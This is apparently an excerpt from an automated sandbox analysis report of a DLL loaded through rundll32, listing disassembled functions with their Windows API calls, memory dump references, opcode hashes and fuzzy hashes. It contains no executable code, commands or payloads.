                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CloseEnumH_prolog3OpenQueryValue
                                                                                                                                                            • String ID: Software\
                                                                                                                                                            • API String ID: 3878845136-964853688
                                                                                                                                                            • Opcode ID: f1b56214fd335d4f9116c0b783ab986839370396de21831478769312653865ef
                                                                                                                                                            • Instruction ID: 033a50cfb30fa6cc3e6a93964c888ed0270874f81604230ed873c3433942879c
                                                                                                                                                            • Opcode Fuzzy Hash: f1b56214fd335d4f9116c0b783ab986839370396de21831478769312653865ef
                                                                                                                                                            • Instruction Fuzzy Hash: EB41BD3590021ADBDF11DBA4CC85AEFB7F9EF49300F10452AF551E7290DB74AA84CBA1
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 1001AC0A Relevance: 10.6, APIs: 7, Instructions: 115windowCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • GetParent.USER32(?), ref: 1001AC38
                                                                                                                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 1001AC5F
                                                                                                                                                            • UpdateWindow.USER32 ref: 1001AC79
                                                                                                                                                            • SendMessageA.USER32 ref: 1001AC9D
                                                                                                                                                            • SendMessageA.USER32 ref: 1001ACB7
                                                                                                                                                            • UpdateWindow.USER32 ref: 1001ACFD
                                                                                                                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 1001AD31
                                                                                                                                                              • Part of subcall function 1001DDC0: GetWindowLongA.USER32(?,000000F0), ref: 1001DDCB
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Message$Window$PeekSendUpdate$LongParent
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2853195852-0
                                                                                                                                                            • Opcode ID: 8feb0ac7bae7ce442b8f735e4586b594c24fd72a806b3adb2c8abbd7d5165037
                                                                                                                                                            • Instruction ID: 2c496a546f4f3369c4007c2120619f6f6246382fa3c8875764faf214921a126d
                                                                                                                                                            • Opcode Fuzzy Hash: 8feb0ac7bae7ce442b8f735e4586b594c24fd72a806b3adb2c8abbd7d5165037
                                                                                                                                                            • Instruction Fuzzy Hash: CF419C306047419FD721DF218D84A1BBAE4FFC6B95F00092DF8829A5A1E772D9C4CA92
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 100151F8 Relevance: 10.6, APIs: 7, Instructions: 111windowCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: MessageSend$ActiveCaptureFocusLastPopup
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3219385341-0
                                                                                                                                                            • Opcode ID: 0692041214081e2f36a8d4241324024d2ae50e87aeefd30631ef423bb921d550
                                                                                                                                                            • Instruction ID: 62284d7f9b5d477bd881e5ff36e2f7527576b9e0115aa241cae08abffcb520cf
                                                                                                                                                            • Opcode Fuzzy Hash: 0692041214081e2f36a8d4241324024d2ae50e87aeefd30631ef423bb921d550
                                                                                                                                                            • Instruction Fuzzy Hash: B2314975301315EFDA11DB64ECC4D6F7AEEEB866C1B530469F840DB112DB31EC8196A2
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 1002A200 Relevance: 10.6, APIs: 7, Instructions: 86windowCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • GetWindow.USER32(?,00000002), ref: 1002A21B
                                                                                                                                                            • GetParent.USER32(?), ref: 1002A22C
                                                                                                                                                            • GetWindow.USER32(?,00000002), ref: 1002A24F
                                                                                                                                                            • GetWindow.USER32(?,00000002), ref: 1002A261
                                                                                                                                                            • GetWindowLongA.USER32(?,000000EC), ref: 1002A270
                                                                                                                                                            • IsWindowVisible.USER32(?), ref: 1002A28A
                                                                                                                                                            • GetTopWindow.USER32(?), ref: 1002A2B0
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Window$LongParentVisible
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 506644340-0
                                                                                                                                                            • Opcode ID: 4c680b8172efdff4f43197e84ba51ed07d499ac862c14e8ee8a7a782e640ae8a
                                                                                                                                                            • Instruction ID: 0686fc7eee0d828e519c8ddef4b664d273c3d3866c12363d81ce6f3f8585b441
                                                                                                                                                            • Opcode Fuzzy Hash: 4c680b8172efdff4f43197e84ba51ed07d499ac862c14e8ee8a7a782e640ae8a
                                                                                                                                                            • Instruction Fuzzy Hash: 8D219532A00B25EBD621EBB99C49F1B76DCFF8A790F810514F991EB152DF26EC848750
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 10032A89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 70threadCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • ___set_flsgetvalue.LIBCMT ref: 10032AB8
                                                                                                                                                            • __calloc_crt.LIBCMT ref: 10032AC4
                                                                                                                                                            • CreateThread.KERNEL32(00000002,?,V&',00000000,?,1001623D), ref: 10032B08
                                                                                                                                                            • GetLastError.KERNEL32(?,1001623D,?,?,100160A8,?,00000002,00000030,?,00000000), ref: 10032B12
                                                                                                                                                            • __dosmaperr.LIBCMT ref: 10032B2A
                                                                                                                                                              • Part of subcall function 100311F4: __getptd_noexit.LIBCMT ref: 100311F4
                                                                                                                                                              • Part of subcall function 10037753: __decode_pointer.LIBCMT ref: 1003775C
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd_noexit
                                                                                                                                                            • String ID: V&'
                                                                                                                                                            • API String ID: 1067611704-802299783
                                                                                                                                                            • Opcode ID: 7692696f047afdf50ec9d72e30f89faf206a335569b9867b5efcd1348c4cc88e
                                                                                                                                                            • Instruction ID: 55a26fe1f49629ebb029cc0f5307a0876855c5a2f29d8e6ee061ec31c14b4724
                                                                                                                                                            • Opcode Fuzzy Hash: 7692696f047afdf50ec9d72e30f89faf206a335569b9867b5efcd1348c4cc88e
                                                                                                                                                            • Instruction Fuzzy Hash: 28112376505205EFDB02EFA4DC8288FBBE8FF08366F210429F501DA061EB31A910CBA1
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 10001390 Relevance: 10.6, APIs: 7, Instructions: 67COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 10016C9F: _memset.LIBCMT ref: 10016CB6
                                                                                                                                                            • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 100013DA
                                                                                                                                                            • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 100013EC
                                                                                                                                                            • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 100013FE
                                                                                                                                                            • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10001410
                                                                                                                                                            • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10001422
                                                                                                                                                            • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10001446
                                                                                                                                                            • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10001458
                                                                                                                                                              • Part of subcall function 100136C0: LoadIconA.USER32 ref: 100136D2
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ProcessorVirtual$Concurrency::RootRoot::$IconLoad_memset
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2004563703-0
                                                                                                                                                            • Opcode ID: 6dfda32c90deb5612abc77854e0b58487ec939f19a89b76ccee82452222fe2ce
                                                                                                                                                            • Instruction ID: cb42d3b07606be4c321c66a21cc03232491b7df8b22d3b1298026f5f2f4788d5
                                                                                                                                                            • Opcode Fuzzy Hash: 6dfda32c90deb5612abc77854e0b58487ec939f19a89b76ccee82452222fe2ce
                                                                                                                                                            • Instruction Fuzzy Hash: 1A216DB4904299EBDB04CBA8C951BAEBB75FF05704F148558E4516B3C2CB79AA00CB65
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 10017632 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65registryCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 10017660
                                                                                                                                                            • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10017683
                                                                                                                                                            • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 1001769F
                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 100176AF
                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 100176B9
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CloseCreate$Open
                                                                                                                                                            • String ID: software
                                                                                                                                                            • API String ID: 1740278721-2010147023
                                                                                                                                                            • Opcode ID: f07ad67f425876aa3b9c3d1abad745f5130b44368e02ee1c7008248ac9000b61
                                                                                                                                                            • Instruction ID: 0cbbb75e8a23424455f11a5bf93a60ebfd6ed3f7897ef2d174d7de764d8d358b
                                                                                                                                                            • Opcode Fuzzy Hash: f07ad67f425876aa3b9c3d1abad745f5130b44368e02ee1c7008248ac9000b61
                                                                                                                                                            • Instruction Fuzzy Hash: E911C576900169FBDB21DB9ACD88CDFBFBCEF8A740B1040AAE504E2121D3719A55DB60
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 10001180 Relevance: 10.6, APIs: 7, Instructions: 54COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • ~_Task_impl.LIBCPMT ref: 100011B6
                                                                                                                                                              • Part of subcall function 10018A6F: __EH_prolog3.LIBCMT ref: 10018A76
                                                                                                                                                            • ~_Task_impl.LIBCPMT ref: 100011C8
                                                                                                                                                            • ~_Task_impl.LIBCPMT ref: 100011EC
                                                                                                                                                              • Part of subcall function 10018AC4: __EH_prolog3.LIBCMT ref: 10018ACB
                                                                                                                                                            • ~_Task_impl.LIBCPMT ref: 100011FE
                                                                                                                                                            • ~_Task_impl.LIBCPMT ref: 10001210
                                                                                                                                                            • ~_Task_impl.LIBCPMT ref: 10001222
                                                                                                                                                            • ~_Task_impl.LIBCPMT ref: 10001231
                                                                                                                                                              • Part of subcall function 10018662: __EH_prolog3.LIBCMT ref: 10018669
                                                                                                                                                              • Part of subcall function 10016C14: __EH_prolog3.LIBCMT ref: 10016C1B
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Task_impl$H_prolog3
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1204490572-0
                                                                                                                                                            • Opcode ID: 10d967965786d9dd3e33bfeddf35d30d57af0e4a65215ad2dc6e6a32aea05cb1
                                                                                                                                                            • Instruction ID: 6e4cb6b4a122521f521244997ac3fe4936e5f385243ec76687bf906466ac38b5
                                                                                                                                                            • Opcode Fuzzy Hash: 10d967965786d9dd3e33bfeddf35d30d57af0e4a65215ad2dc6e6a32aea05cb1
                                                                                                                                                            • Instruction Fuzzy Hash: 6B215970905189DBEF09DB98C860BBEBB75EF01308F18469DE0526B3C2CB392B00C716
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 10020A8E Relevance: 10.6, APIs: 7, Instructions: 51memoryCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 10020A95
                                                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 10020A9F
                                                                                                                                                              • Part of subcall function 10033135: RaiseException.KERNEL32(?,?,?,?), ref: 10033175
                                                                                                                                                            • LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004), ref: 10020AB6
                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031,00000000), ref: 10020AC3
                                                                                                                                                              • Part of subcall function 100201BD: __CxxThrowException@8.LIBCMT ref: 100201D1
                                                                                                                                                            • _memset.LIBCMT ref: 10020AE2
                                                                                                                                                            • TlsSetValue.KERNEL32(?,00000000), ref: 10020AF3
                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031,00000000), ref: 10020B14
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 356813703-0
                                                                                                                                                            • Opcode ID: 83477c0e15d1c33d1bb5ec65c1815380ae7d3f4553bdd0be20f92f622c24e4f3
                                                                                                                                                            • Instruction ID: 3e12b38782b34356c97e10a87625d487b7a933956f885299f771b8ffc362d3ba
                                                                                                                                                            • Opcode Fuzzy Hash: 83477c0e15d1c33d1bb5ec65c1815380ae7d3f4553bdd0be20f92f622c24e4f3
                                                                                                                                                            • Instruction Fuzzy Hash: 7B117974100305AFE721EF60CD86D2ABBA6EF44314B51C029F8569A622DB30FC60CB50
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 10020EEA Relevance: 10.5, APIs: 7, Instructions: 29COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Color$Brush
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2798902688-0
                                                                                                                                                            • Opcode ID: 72252987b8d251bab477bb0d0c872f96bc616149d35122bfb9b146a10746700a
                                                                                                                                                            • Instruction ID: b96cbce945517a62156269669ca61c0ebe7744eb3e98ebe12a1aee9bfd1db884
                                                                                                                                                            • Opcode Fuzzy Hash: 72252987b8d251bab477bb0d0c872f96bc616149d35122bfb9b146a10746700a
                                                                                                                                                            • Instruction Fuzzy Hash: 65F012719407449BD730BF728D49B47BAD5FFC4710F02092EE2418B990E6B6E040DF44
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 1002981B Relevance: 9.4, APIs: 6, Instructions: 404COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 10029837
                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 1002989C
                                                                                                                                                              • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 10029AAB
                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 10029B1D
                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 10029D0E
                                                                                                                                                              • Part of subcall function 1002BDB9: VariantCopy.OLEAUT32(?,?), ref: 1002BDC7
                                                                                                                                                              • Part of subcall function 10013820: _DebugHeapAllocator.LIBCPMTD ref: 10013875
                                                                                                                                                              • Part of subcall function 1002C06F: __EH_prolog3.LIBCMT ref: 1002C079
                                                                                                                                                              • Part of subcall function 1002C06F: lstrlenA.KERNEL32(?,00000224,10029CDA,?,00000008,00000000,?,000000CC), ref: 1002C098
                                                                                                                                                              • Part of subcall function 1002C06F: SysAllocStringByteLen.OLEAUT32(?,00000000), ref: 1002C0A0
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Variant$Clear$H_prolog3$AllocAllocatorByteCopyDebugException@8HeapStringThrowlstrlen
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 63617653-0
                                                                                                                                                            • Opcode ID: 5e2e0a19dc0039e2f502762359befe2295f094a54db6864ce8f61926c363e3fd
                                                                                                                                                            • Instruction ID: 8f7f5911e4d3fd52506e0ebb541b856e7b36a578254e0be009e80c36fe1d785e
                                                                                                                                                            • Opcode Fuzzy Hash: 5e2e0a19dc0039e2f502762359befe2295f094a54db6864ce8f61926c363e3fd
                                                                                                                                                            • Instruction Fuzzy Hash: 13F16D7890024CEBDF55DFA0E890AFD7BB9EF08384F90405AFC5593191DB74AA88DB61
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 1002D1E9 Relevance: 9.3, APIs: 6, Instructions: 253stringCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3_catch_GS.LIBCMT ref: 1002D1F0
                                                                                                                                                            • lstrlenA.KERNEL32(00000000,000000FF,00000050,10022221,00000000,00000001,?,?,000000FF,?,?,?), ref: 1002D222
                                                                                                                                                              • Part of subcall function 10017790: _memcpy_s.LIBCMT ref: 100177A0
                                                                                                                                                            • _memset.LIBCMT ref: 1002D2F2
                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 1002D3D1
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ClearH_prolog3_catch_Variant_memcpy_s_memsetlstrlen
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 4021759052-0
                                                                                                                                                            • Opcode ID: dc537336900b1f9e5654c723f7bc7d689170c1efb2efdbad80408bb984cec35a
                                                                                                                                                            • Instruction ID: 5c01f4bcc98ccee0a604cdfa5feeb0fdece88e80b40f5b50a3c571396f452454
                                                                                                                                                            • Opcode Fuzzy Hash: dc537336900b1f9e5654c723f7bc7d689170c1efb2efdbad80408bb984cec35a
                                                                                                                                                            • Instruction Fuzzy Hash: 50A18C35C04249DBCF11EFA4E985AEEBBF0FF04350FA0415AE914AB291D734AE41DB61
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 1002D5D0 Relevance: 9.1, APIs: 6, Instructions: 118memoryCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • _memset.LIBCMT ref: 1002D5FF
                                                                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 1002D650
                                                                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 1002D674
                                                                                                                                                              • Part of subcall function 100200B9: __EH_prolog3.LIBCMT ref: 100200C0
                                                                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 1002D6CC
                                                                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 1002D6F5
                                                                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 1002D724
                                                                                                                                                            Memory Dump Source
